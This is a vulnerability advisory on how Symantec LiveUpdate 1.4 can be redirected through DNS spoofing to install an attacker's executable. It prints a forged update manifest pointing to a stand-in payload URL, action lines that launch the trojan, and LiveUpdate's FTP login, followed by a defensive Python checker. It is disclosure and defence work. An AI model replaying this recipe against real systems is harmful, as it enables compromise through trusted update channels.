LiveUpdate is a tool shipped with most Symantec products to download updates from the Symantec update servers. It is included as part of the Norton Antivirus Package and several other products in the Symantec product line.
Version 1.4 of LiveUpdate (shipped with Norton Antivirus 5.x) can be used for rapid deployment of hostile code (backdoors, Trojan applications, viruses, worms - if unknown to Norton Anti Virus) and for remote penetration of systems running LiveUpdate via redirection of the initial connection to a server controlled by the attacker.
Version 1.6 of LiveUpdate (shipped with the latest Norton Antivirus 2001 package) does not allow for this type of attack, but it can be prevented from downloading virus descriptions and product updates. It can also be used as part of distributed denial of service attacks by the same attack as described for version 1.4.
Credit:
The information has been provided by FX.
Vulnerable systems:
Symantec LiveUpdate version 1.4
Symantec LiveUpdate version 1.6
When LiveUpdate 1.4 is started (either by hand or as a scheduled task), it looks for the server update.symantec.com. An attacker can use one of several attacks to return false information to the querying host such as:
- The attacker controls the DNS server and creates a master zone for symantec.com.
- The attacker uses routing-based attacks to impersonate the DNS server.
- The attacker uses DNS poisoning on the DNS server to return a false IP address.
- The attacker uses layer 2 connection interception to impersonate the DNS server.
- The attacker sends false DNS responses to the querying host.
When the host running LiveUpdate tries to connect to update.symantec.com via FTP, it is actually connecting to the FTP server of the attacker's choice. LiveUpdate will then try to receive the file livetri.zip located in the FTP server directory /opt/content/onramp. This archive contains the file LIVEUPDT.TRI that holds a complete list of all Symantec product updates. After LiveUpdate has received the file, it will compare the product versions to the versions of the Symantec products installed on the host and check the appropriate sequence numbers to see if an update is required. If an update is required, LiveUpdate will receive the file specified, uncompress it (ZIP format), and perform the actions described in the .dis file. This includes the execution of downloaded executables. The reader might see by now how an attacker can use this behavior in ways other than intended by Symantec.
LiveUpdate 1.6 follows the same procedure described above with one exception. The actual downloaded update package is different. First, it is no longer a classic ZIP archive but rather some type of Symantec data compression. Additionally, the file contains "cryptographic signatures" of all update files. This signature makes it virtually impossible to use LiveUpdate 1.6 as a penetration tool. However, by specifying a large file location on the Internet, a scheduled LiveUpdate session in a medium-sized company will lead to network degradation and outages due to the large amount of traffic generated.
An item of interest is that version 1.6 does not use cryptographic signatures to verify the initial list LIVEUPDT.TRI even though it places signatures on all other files. By applying the attack described above and never changing the content of the file, one can prevent any updates the victim host might require.
Example:
An example attack was performed for LiveUpdate 1.4 by taking over a DNS server and creating a master zone for symantec.com. A false address for the FTP server update.symantec.com was then returned. This FTP server was configured with the user 'cust-r2', which is used by LiveUpdate with the password 'Alpc2p30'. It is not known if all LiveUpdate installations use the same username and password - but it is not relevant.
The file /opt/content/onramp/livetri.zip contained a modified LIVEUPDT.TRI file with the following content:
[LiveUpdate]
Legal=Copyright 1995-2000 (c) Symantec Corporation
LastModified=20010920 05:58PM
Type0=Updates
Type1=Add-Ons
Type2=Documentation
[Mandatory0]
Exclusive=FALSE
ProductName=LiveUpdate
Version=1.4
Language=English
ItemSeqName=LiveUpdateSeq
ItemSeqData=20000508
FileName=ihack.x86
Size=624807
ActionItem=noreboot.dis
TypeName=Updates
ItemName=LiveUpate 1.6
ItemDetails=Hacks your computer using LiveUpdate
Platform=x86
AdminCompatible=FALSE
URL=http://www.example.com/hackme.x86
While LiveUpdate 1.4 has a preference to use the FileName entry and tries to receive the file via FTP, 1.6 prefers the URL given. Since this is a mandatory update for LiveUpdate itself, it will receive the file first and then try to update itself.
The file ihack.x86 is actually a renamed ihack.zip file with the following content:
NOREBOOT.DIS
LUUPDATE.EXE
LUSETUP.EXE
LUUPDATE.EXE is the Trojan/backdoor/whatever file the attacker wants the system to execute. NOREBOOT.DIS is an INI-like file that contains the actions LiveUpdate should perform when downloading of the file is complete. It has the following content:
UPDATE (TempDir\*.EXE, LiveUpdateDir, 0)
LAUNCH (LiveUpdateDir, LUUPDATE.EXE, "", 0)
DELAYDELETE (LiveUpdateDir, LUUPDATE.EXE)
LUSETUP.exe was part of a real update package we inspected and might be left out - this was not tested. We just used the same file as LUUPDATE.exe and it worked.
When the victim host triggered the update mechanism, it downloaded livetri.zip and then ihack.x86. It then executed the application LUUPDATE.exe and told the user "the update was successfully completed. Thank you."
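The following is an added example, not Symantec's code or anything from the advisory's authors. It parses the LIVEUPDT.TRI manifest shown above, reproduces the client-side selection step described earlier (product, version and language must match, and the manifest's ItemSeqData must be newer than the installed sequence, with the 1.4 FileName-over-FTP versus 1.6 URL preference as a switch), and then wraps that selection in the two checks the advisory says are missing: the manifest itself must carry a valid signature, and each selected item is screened for an off-vendor download location and an oversized package. The installed-product table, the host allowlist, the size cap and the signing key are constructed assumptions; HMAC-SHA256 from the standard library stands in for the vendor's public-key signature, which a real client would verify with a pinned public key instead.

```python
"""Added example (not Symantec code): manifest selection plus the checks a
hardened LiveUpdate-style client would run. Manifest text is the one from
the advisory; INSTALLED, ALLOWED_HOSTS, MAX_ITEM_BYTES and VENDOR_KEY are
constructed assumptions."""
import configparser
import hashlib
import hmac
from urllib.parse import urlparse

# Manifest exactly as printed in the advisory's example.
MANIFEST = """[LiveUpdate]
Legal=Copyright 1995-2000 (c) Symantec Corporation
LastModified=20010920 05:58PM
Type0=Updates
Type1=Add-Ons
Type2=Documentation
[Mandatory0]
Exclusive=FALSE
ProductName=LiveUpdate
Version=1.4
Language=English
ItemSeqName=LiveUpdateSeq
ItemSeqData=20000508
FileName=ihack.x86
Size=624807
ActionItem=noreboot.dis
TypeName=Updates
ItemName=LiveUpate 1.6
ItemDetails=Hacks your computer using LiveUpdate
Platform=x86
AdminCompatible=FALSE
URL=http://www.example.com/hackme.x86
"""

# Constructed: (ProductName, Version, Language) -> {ItemSeqName: last applied ItemSeqData}.
INSTALLED = {("LiveUpdate", "1.4", "English"): {"LiveUpdateSeq": 20000101}}

# Constructed policy for the hardened client.
ALLOWED_HOSTS = ("symantec.com",)     # update URLs must sit under a vendor domain
MAX_ITEM_BYTES = 50 * 1024 * 1024     # cap per package; limits the traffic-flood angle
VENDOR_KEY = b"constructed-demo-key"  # stand-in for the vendor's signing key (assumption)


def parse_manifest(text):
    """Return (header dict, list of item dicts) from the INI-style TRI text."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case, e.g. ItemSeqName
    cp.read_string(text)
    header = dict(cp["LiveUpdate"])
    items = [dict(cp[s]) for s in cp.sections() if s != "LiveUpdate"]
    return header, items


def applicable_items(items, installed, prefer_url):
    """Client selection step: matching product and a newer sequence number.
    prefer_url=False mimics 1.4 (FileName via FTP), True mimics 1.6 (URL)."""
    chosen = []
    for it in items:
        seqs = installed.get((it["ProductName"], it["Version"], it["Language"]))
        if seqs is None or int(it["ItemSeqData"]) <= seqs.get(it["ItemSeqName"], 0):
            continue
        source = it["URL"] if prefer_url and it.get("URL") else it["FileName"]
        chosen.append((it["ItemName"], source, int(it["Size"]), it["ActionItem"]))
    return chosen


def sign_manifest(text, key=VENDOR_KEY):
    """Vendor side of the stand-in scheme: tag over the exact manifest bytes."""
    return hmac.new(key, text.encode(), hashlib.sha256).digest()


def verify_manifest(text, signature, key=VENDOR_KEY):
    """A manifest with no signature, or a bad one, is never acted on."""
    if signature is None:
        return False
    return hmac.compare_digest(sign_manifest(text, key), signature)


def policy_violations(item):
    """Per-item screening run before any download starts."""
    name, source, size, _action = item
    problems = []
    if source.lower().startswith(("http://", "https://", "ftp://")):
        host = urlparse(source).hostname or ""
        if not any(host == d or host.endswith("." + d) for d in ALLOWED_HOSTS):
            problems.append(f"{name}: source host {host!r} not under vendor domain")
    if size > MAX_ITEM_BYTES:
        problems.append(f"{name}: declared size {size} exceeds cap")
    return problems


def process(text, signature, prefer_url=True):
    """Hardened pipeline: signature gate, then selection, then per-item policy."""
    if not verify_manifest(text, signature):
        return {"accepted": False, "reason": "manifest signature missing or invalid", "items": []}
    _header, items = parse_manifest(text)
    chosen = applicable_items(items, INSTALLED, prefer_url)
    violations = [p for it in chosen for p in policy_violations(it)]
    return {"accepted": not violations, "reason": "; ".join(violations), "items": chosen}


if __name__ == "__main__":
    # An unsigned-manifest client selects the item as soon as the sequence is newer.
    print(applicable_items(parse_manifest(MANIFEST)[1], INSTALLED, prefer_url=False))
    # The hardened pipeline refuses: first for the missing signature, then, even when
    # the manifest is correctly signed, for the off-vendor URL.
    print(process(MANIFEST, signature=None))
    print(process(MANIFEST, sign_manifest(MANIFEST)))
```

The order of the gates matters: signature verification happens on the raw manifest bytes before anything is parsed, so a spoofed server that can only redirect the connection gets no further than the first check, and the host allowlist and size cap are there for the case the advisory raises for 1.6, where the manifest is unsigned but the packages are not.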
Vendor response:
According to symsecurity@symantec.com, LiveUpdate 1.4 is no longer the current version and every installation should be updated to version 1.6 by now.
Regarding the redirection of the LiveUpdate client, Symantec stated: "This is, unfortunately, an underlying issue with the Internet infrastructure that we are well aware of but have limited control over other than with connection points over which we exercise authority."
As for the denial of service condition, the statement is: "The denial of service activity, while potentially possible under the scenarios you indicate below, would affect only a small percentage of our user base as any spoofing, redirection would be limited to a local Internet area/region."
Solution:
The improvements Symantec introduced in LiveUpdate 1.6 and higher are actually "best practice security". It would be advisable to update all Symantec products using LiveUpdate to version 1.6. This however does not prevent an attacker from using LiveUpdate as a denial of service tool or preventing system updates.
Symantec should use the same cryptographic signature method on the livetri.zip file and advise its customer base of the fact that LiveUpdate 1.4 is highly insecure.
Beware! LiveUpdate 1.4 WILL NOT update itself to 1.6 as far as we are able to determine. The latest LiveUpdate 1.6.x is available from the URL http://www.symantec.com/techsupp/files/lu/lu.html
According to Symantec, the next version of LiveUpdate will further enhance security. No statement about the nature of these enhancements was made.